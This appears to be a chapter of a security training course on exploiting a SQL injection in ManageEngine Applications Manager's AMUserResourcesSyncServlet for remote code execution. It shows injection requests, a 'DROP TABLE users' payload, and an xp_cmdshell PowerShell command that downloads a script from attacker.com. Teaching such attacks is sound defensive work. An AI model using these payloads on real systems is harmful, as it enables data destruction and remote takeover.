Chapter 5 ManageEngine Applications Manager AMUserResourcesSyncServlet SQL Injection RCE

Chapter 5 - ManageEngine Applications Manager AMUserResourcesSyncServlet SQL Injection RCE

Overview

This chapter delves into a SQL Injection vulnerability present in the AMUserResourcesSyncServlet of the ManageEngine Applications Manager. This vulnerability can be exploited to achieve Remote Code Execution (RCE) on the affected system.

Getting Started

  • Setting Up the Environment: Begin by configuring a test environment with the vulnerable version of ManageEngine Applications Manager, ensuring network configurations allow for traffic interception and manipulation.

Vulnerability Discovery

  1. Servlet Mappings and Initial Analysis:

  • Identify that the AMUserResourcesSyncServlet handles specific user resource synchronization tasks.

  • Determine the servlet’s mapping and accessible endpoints through the web.xml or by analyzing HTTP requests.

GET /servlet/AMUserResourcesSyncServlet?sync=true HTTP/1.1
Host: vulnerable-manageengine.com
  1. Source Code Recovery and Analysis:

  • Decompile Java bytecode to review the servlet’s implementation, focusing on how user inputs are handled.

  • Search for signs of concatenated SQL queries which could indicate SQL injection points.

  1. Triggering the Vulnerability:

  • Craft a request to trigger verbose SQL error messages, revealing database structure or table names.

  • Use modified SQL commands to test the susceptibility to SQL injection.

GET /servlet/AMUserResourcesSyncServlet?userID=1 OR 1=1-- HTTP/1.1
Host: vulnerable-manageengine.com

Exploitation of the Vulnerability

  1. Crafting SQL Injection Payloads:

  • Develop payloads that leverage the injection point to manipulate SQL queries for unauthorized data access or manipulation.

  • Utilize time-based SQL injection techniques to confirm the vulnerability when error-based feedback is not available.

userID=1; DROP TABLE users;--
  1. Achieving Remote Code Execution:

  • Exploit the SQL injection to modify database entries or deploy malicious SQL stored procedures.

  • Upload and execute a reverse shell or malicious payload through the database server’s file system access capabilities.


userID=1; EXEC xp_cmdshell 'powershell -c "Invoke-WebRequest -Uri http://attacker.com/shell.ps1 -OutFile C:\shell.ps1"';--

Summary

This chapter demonstrates the critical nature of properly sanitizing user inputs and using prepared statements to avoid SQL injection vulnerabilities. The exercises encourage hands-on exploitation, emphasizing the importance of thorough testing and validation in web application security practices.